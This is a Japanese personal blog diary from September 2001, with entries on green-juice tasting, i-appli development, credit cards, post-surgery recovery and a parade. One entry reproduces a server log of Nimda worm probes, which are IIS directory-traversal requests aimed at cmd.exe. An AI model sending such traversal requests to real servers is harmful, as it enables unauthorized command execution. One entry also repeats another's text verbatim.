2001-09-29 はじめての青汁
キューサイの青汁を飲む機会があったので,あの液体の味を報告します。(説明不要だとは思いますが,キューサイ青汁は「ケール」という野菜をすり潰した飲み物です。)
キューサイ青汁は冷凍されているので,まずこいつを解凍してから器に注ぎます。見た目は緑色の液体そのものです。たぶん,ガチャピンをすり潰しても似たような液体になるのでしょう(ふめい)。
さて,器を口元に運んでみると,意外にも青臭い匂いがしません(少しはします)。おもむろに口に含んでみました。「なるほどこれがケール100%の味なのね。噂どおりマズイけど,まったく飲めない味ではないな」などと,私ははじめ青汁が噂ほど酷い飲み物ではないと高を括っていました。しかしつぎの瞬間,頭をハンマーで殴られたような,そんな軽い目眩の症状を感じました。青汁の反撃です。「ひょっとしたら,このまま気絶するんじゃないか」と少し焦りました。どうやらケール100%を甘くみすぎたようですね。
私は目眩と格闘しながら,青汁をなんとか飲み干しました。後味はさっぱりしていて,口の中にいつまでも残ることはありませんでした。しかし,お世辞にも飲みやすいとは思えません。やはり玄人向けです。この頃は「おいしい青汁」なんていう製品があるそうです。激しい味が苦手な人は素直に飲みやすい青汁を選ばれた方がよいと思います。
2001-09-27 シラネーヨが“iアプリ”に異常接近
覚えている人がいるのか,いないのか知りませんが,「シラネーヨ」のiアプリの話がなぜか進展しているので報告します。本日,おおまかな開発環境を整備してみました。「シラネーヨ」をとりあえずiアプリにしてみたところ,拍子抜けするくらい簡単にできてしまいました。もっとも,ただ画像を表示してみただけなので,「だからどうした?」と言われたら返すことばがないんですけどね。
しかもまだエミュレータ上での動作です。私は503iシリーズどころか移動電話そのものを所有していません。十字キーらしきものに遭遇したのも今日がはじめてです。つまり,よく分からないものを作っている状態なのです。
大きな画像を見る(1280x1024 画素)☆画像の説明:デスクトップ画面を撮影してみました。相変わらず(懲りずに)Microsoft Visual J++ 6.0 を使っております。
――さて,「シラネーヨ」をiアプリにする手はずは整いましたが,一つ肝心なことが決まっていません。それは「シラネーヨ」のどんなアプリケーションを作るかです。もう少し考えてみますね。
※シラネーヨのiモード対応Javaアプリケーションの発表時期は,2002年1月頃を予定しております(私が「いついつの予定です」と言ったとき期日には,1年ほどの誤差があります)。
2001-09-25 某パレード会場その後
某日,某パレード会場をさり気なく撮影してきてしまいました。「どうして夜の風景なのか」と尋ねられたら,「たまたま夜にデジカメを持ち歩いていたからだよ」としか答えられません。夜景に深い意味はないのです。
撮影はデジカメの夜景モード(ホワイトバランス,フォーカス,シャッタースピードはデジカメにおまかせ)を使ってみました。意外ときれいに撮影できるものですね。
2001-09-25 クレジットカード使ってみました
クレジットカードを入手して,はや2か月が経過しました。使ってみた感想を少々。クレジットカードってとっても便利なものなんですね。お財布にお金がなくても買い物ができるのがありがたいです(ってあたりまえの話だが)。ネット通販の支払いに重宝するのはもちろんのこと,ローソンで使えるのがちょっとした驚きです。前々からローソンでカードが使えるらしいということは知っていたけれど,本当に清算できるから不思議なものです。
さて,クレジットカードでよく問題になるのが金銭感覚の麻痺です。いわゆる借金地獄の話ですね。私も「悪魔のキス」の真理子さん(常盤貴子が演じた借金娘)にはなりたくないので,かなり気をつけております。まあ,私は専ら一括払いしかしてません。デビットカードの替わりみたいな使い方です。分割払いとか,リボルビング払い(revolving loan:回転信用方式)は手数料が掛かるし,買い物してから数か月間,ズルズルと支払い続けるのはなんだか気味が悪いものです。
2001-09-25 術後日記―その17―
術後,6か月が経ちました。この頃の様子を少々。
古傷が痛むような
肌寒さを感じられる季節になりました。稀に患部に鈍い痛みというか刺激を感じることがあります。涼しくなって血行がやや悪くなっているからなのかもしれませんが,原因はよく分かりません。
この顔は私ではない
神経障害はその後も緩やかに回復しています。この頃,感覚がさらに鮮明になってきたのですが,同時に整形した個所に違和感を感じるようになりました。以前,私は整形した個所を目で見て違和感を感じていました。そして,その感覚はいつの間にか消失しました。視覚は術後の顔に慣れたのです。
しかし,触覚はまだ慣れていません。今まで患部の神経が酷く麻痺していたので,術後,顔の形が変わっているのに,それがどれだけ変わっているものなのか,触覚では感じ取れていなかったのです。それが分かり始めると,とても不気味なものです。この顔は私ではありません。記憶の中にある形と,実際に感じ取れる形とが一致しません。どうも見当違いな場所に見当違いな部品が乗っかっているような,喩えるのは難しいですが鼻が逆さまについているとか,そんなような雰囲気です。
恥ずかしい告白――私はパパにこんな恥ずかしいことをされました――
ちなみに,ネタをバレしてしまうと,http://www.lorenzsurgical.com/images/plates.jpg ←こいつとほとんど同じ部品が四箇所に埋め込まれています。
術中,パパに http://www.lorenzsurgical.com/images/external.jpg ←これと似たとても恥ずかしいことをされてしまいました(猛毒)。
そのあと http://www.lorenzsurgical.com/images/jaw.jpg ←こんなふうに仮止めしてもらいました。現物は画像よりも大人しめに仮止めされています。レントゲン写真で結合個所を見ると,「こんなに小さな部品で本当に大丈夫なのか」と不安になるほどです。皮膚の上から繋ぎ目を指で触れてみても,埋め込み物の存在は確認できません。多い日でも安心なのです(いみふめい)。
これとは別にもう一箇所イジっているのだが,こいつをやったばかりに術後,鼻血が止まらなくなってパッキャラマードでした(恐ろしく苦痛だったという意味)。その話はまた次回。
「術後日記」を楽しみにしている人がいるのか,まったくもって不明です。「怖すぎる」と思う人がいたらご一報ください。
2001-09-25 はたらくおにいさん―その17―
クレジットカードを入手して,はや2か月が経過しました。使ってみた感想を少々。クレジットカードってとっても便利なものなんですね。お財布にお金がなくても買い物ができるのがありがたいです(ってあたりまえの話だが)。ネット通販の支払いに重宝するのはもちろんのこと,ローソンで使えるのがちょっとした驚きです。前々からローソンでカードが使えるらしいということは知っていたけれど,本当に清算できるから不思議なものです。
さて,クレジットカードでよく問題になるのが金銭感覚の麻痺です。いわゆる借金地獄の話ですね。私も「悪魔のキス」の真理子さん(常盤貴子が演じた借金娘)にはなりたくないので,かなり気をつけております。まあ,私は専ら一括払いしかしてません。デビットカードの替わりみたいな使い方です。分割払いとか,リボルビング払い(revolving loan:回転信用方式)は手数料が掛かるし,買い物してから数か月間,ズルズルと支払い続けるのはなんだか気味が悪いものです。
2001-09-25 連休のすごしかた
こんばんは,そろそろ寝る時間です。お布団に入る前に連休中,私が何をしたか少々。
お買い物,2ちゃんねるに明け暮れておりました(毒)。まあ,いつもどおりですね。「おさんぽ」はしませんでしたよ。野外散策の時期はすでに終わっております。
2001-09-23 悪魔の公開メール
я∀1(y+1)ο∩(らぃぞぅ)さんへ(ふめいすぎ)。既知かもしれませんが,URLご案内しておきます。こーいうのがお好きだと思うので。
- 「ランジェリー戦士パピヨンローゼ」公式サイト
http://www5b.biglobe.ne.jp/~novy/
- 主題歌,挿入歌(変身場面の曲)
http://www5b.biglobe.ne.jp/~novy/html/sound_frame.html
「Original Sound Track」の「Make up Rose」はけっこう危険です。セーラームーンのソレそのものなのだが,TAITO:サイバリオンのCDアルバムの「サイバリオンアレンジバージョン」にもなんだか似ている。
- ビデオクリップ
http://www5b.biglobe.ne.jp/~novy/html/story/story_down.html
2001-09-23 悪魔の公開メール
「ランジェリー戦士パピヨンローゼ」のビデオクリップですが,どうにか見られました。前半は少女革命ウテナのオープニングテーマ,後半は美少女戦士セーラームーンの変身シーンによく似ていました。それにしても,同人誌を作ってる人たちの作品の品質はとても高い。お兄さんは感心してしまいます。
2001-09-23 ↓Nimdaさんその後
まだイタズラが続いています。いつ収束するのやら。
2001-09-20 Nimda ワームが大流行
量が多くてすごいです。私もイタズラされてしまいました(なぞ)。お家のWWWサーバにもアクセス記録がどっさり残っておりました。
10:44:05 211.219.***.*** GET /scripts/root.exe 404 10:44:05 211.219.***.*** GET /MSADC/root.exe 404 10:44:05 211.219.***.*** GET /c/winnt/system32/cmd.exe 404 10:44:06 211.219.***.*** GET /d/winnt/system32/cmd.exe 404 10:44:06 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500 10:44:06 211.219.***.*** GET /_vti_bi..%5c...%5c...%5c../winnt/system32/cmd.exe 500 10:44:07 211.219.***.*** GET /_mem_bi..%5c...%5c...%5c../winnt/system32/cmd.exe 404 10:44:07 211.219.***.*** GET /msad..%5c...%5c...%5..%C1%1C...%C1%1C...%C1%1C../winnt/system32/cmd.exe 500 10:44:07 211.219.***.*** GET /script..%C1%1C../winnt/system32/cmd.exe 500 10:44:08 211.219.***.*** GET /scripts/winnt/system32/cmd.exe 404 10:44:08 211.219.***.*** GET /winnt/system32/cmd.exe 404 10:44:08 211.219.***.*** GET /winnt/system32/cmd.exe 404 10:44:09 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500 10:44:09 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500 10:44:09 211.219.***.*** GET /script..%5c../winnt/system32/cmd.exe 500 10:44:10 211.219.***.*** GET /script..%2f../winnt/system32/cmd.exe 500
cmd.exe をイタズラしようとするのですね。悪戯はだめですよ。イタズラは。(注意:強調文字の「%C1」「%1C」には,実際にはエスケープ前の生の文字値が入ります)
2001-09-17 某パレードこっそりショート・レポート
16日,某政令指定都市で某パレードが開催されました。私たち「2ちゃんねらー」もこっそり会場に潜入。催しものの様子を伝えるべく,一部の静止画像を公開します。動画像も撮影しておりますが,ヨコ漏れガードのため公開できません。
行進直前
【画像の説明】 行進準備をしている人たち。ひとりひとりが片手に風船を持っています。街中で一斉に風船を放つ演出があるんだそうです。
ただいま行進中
【画像の説明】 軽快な音楽とともにパフォーマンスを繰り広げる人たち。ちょっと残念ですが,私はマジマジと見物したわけじゃないので,詳しい様子は知りません(傍観しただけです)。
【画像の説明】 行列には参加せず,ステージ前で待機する執行部のみなさま。マガジンラックらしき物が置いてあったのだが,あの場所で某業界紙を販売していたらしいです。
閉会式
【画像の説明】 ステージショーを見物する人たち。昼間だっていうのに飛び跳ねる人が続出しておりました。やはり日頃から踊りなれている人は,身のこなしが違うものですね。
感想
3年前のパレードよりも完成度が高かったです(2年前のパレードはよく知りません。その日ゼミ室に用事があって見物できなかったのです)。さすがに手馴れてきたのかもしれませんね。ただ一部の人が指摘していたように,「内輪の人間が盛り上がるためのお祭り」という雰囲気がプンプンしていました。賛否はあるでしょうが,傍からみた感じではあんまり違和感らしい違和感はありませんでした。
それにしても,まるでテンプレートで拵えたみたいに同じ格好をしている人が多かったですね。同族が集団をなす光景というのは,かなり不気味なものですよ。髪型,服装,歩き方は意識してまちまちにしてもらいたいものです。関係者は次回から気をつけましょう。
おまけ1
「2ちゃんねらー」も市街地を行進して,2ちゃんねるの有用性を啓蒙すべきでしょう。
♪「私たちは‥‥2ちゃんねらーです。」
♪「私たちは‥‥ヒッキー(引きこもり)です。」
♪「2ちゃんねる,大好きですっ。」
なーんて。
おまけ2
♪「私たちは‥‥整形済みです。」
♪「私たちは‥‥目と鼻をイジりました。」
♪「私たちを見てください。私たちは改造人間です。」
注意:禁句です(ふめいすぎ)。
2001-09-10 ICレコーダ初導入
さきほど市内某所をおさんぽしてきました。今日は熱帯夜のためか人影がいつもより多かったようです。私はいつものベンチに腰掛けて人員の調査。さて,ふと隣を見てみるとそこには見知らぬ妖怪が座っていました。私は無視を決め込んでいたのですが,そのうち妖怪が話し掛けてきました。
妖怪 「ねえ,ばい菌部屋,行かない?」
私 「???」
妖怪 「これからどう?あそこなら思う存分・・・<以下省略>」
私 「ばい菌部には行ったことないなあ。」
妖怪 「そういうところには行かないの?公園だけ?」
私 「ええ,お世話になったことないですねー。」
私 「ばい菌部屋にはよく行かれるんですか?」
妖怪 「うん,××と○○(伏せ字個所は,ばい菌部屋の名前)によく行くよ。」
私 「はあ,そうなんですか。ずいぶんよくご存知なんですね。」(妖怪は誉められたと錯覚したのか,ご満悦の表情。)
妖怪 「飲み屋さんには行かないの?」
私 「ええ,行ったことないですねー。場所は知っているんだけど。」
妖怪 「いまの若い人にしては珍しいね。」
私 「そうなんですか?」
妖怪 「いまの人は抵抗ないみたいだからね。」
私 「・・・」(私はあの幼稚園児軍団に抵抗がありすぎるのですが。)
――というわけで,会話を記録するにはICレコーダがとっても役に立ちますね(毒)。これから積極的に活用したいと思います。なにしろ128MBのスマートメディアで21時間も録音できてしまうんだから(標準音質モードのとき)多い日でも安心です。
2001-09-09 MSNメッセンジャーはじめました
yumi_ii_orange@hotmail.comでサインインしております。私に用事のある人は皆無だと思いますが(げ)念のため。
ちなみに以前,使っていたICQのアカウントはすでに失効しています。PCを変えたときにICQを移行しなかったもので。
2001-09-07 量が多いです
こんばんは,今週はあれの量がとっても多かったです。世人モデル会議はいつ開催できるのでしょうか。なるべく遅くならないように調節しましょう。
あとそれから,「おとなのシラネーヨ・公開録音会」っていうのにも挑戦してみたいのよね。できるかどうか分からないけど,連絡だけしておきます。
2001-09-04 はたらくおにいさん―その16―
ITバブル崩壊,株価暴落,各社軒並み赤字決算,そんなニュースばかり聞かされる昨今,みなさんいかがお過ごしでしょうか。私も直撃ではないのだが,返り血を浴びる羽目になってしまいました。現在のプロジェクトが大幅,縮小されてしまうんだそうで(人が余ってしまうという意味),10月から違う部署に異動することになりました。仕事の内容はそんなに変わらないらしいのだが,なんでもお題は新規事業なんだそうでとっても危険な雰囲気です。もう一度,波が押し寄せたらあっさり転覆してしまいそう。
7月下旬あたりから「もしかしてヤバイのかなー」っていう雰囲気は薄々,感じ取っておりました。まあ,就職活動しないで(悪く言えばテキトーに)決めてしまった会社なので,あまり思い入れはないのですが,それでもすぐに傾かれては困るものです。いつでも脱出する準備はできているけど,まだ入社したばっかりなんだから,おいそれと辞めるわけにはいきません。
2001-09-03 『団塊ジュニア・ユミの日記』更新しました
一部に熱狂的なファンがいる(らしい)「団塊ジュニア・ユミの日記」を更新しました。本当は2日の早朝に更新する予定だったのだが,作業が捗らず平日にずれ込んでしまいました。
個人的には「今朝のサヤカ」の完成度を高めたいのだが,アレはかなり火加減が難しいです。1年経った今もなお,雰囲気を確立できていません。もっとも,確立などしなくてよいのかもしれませんが。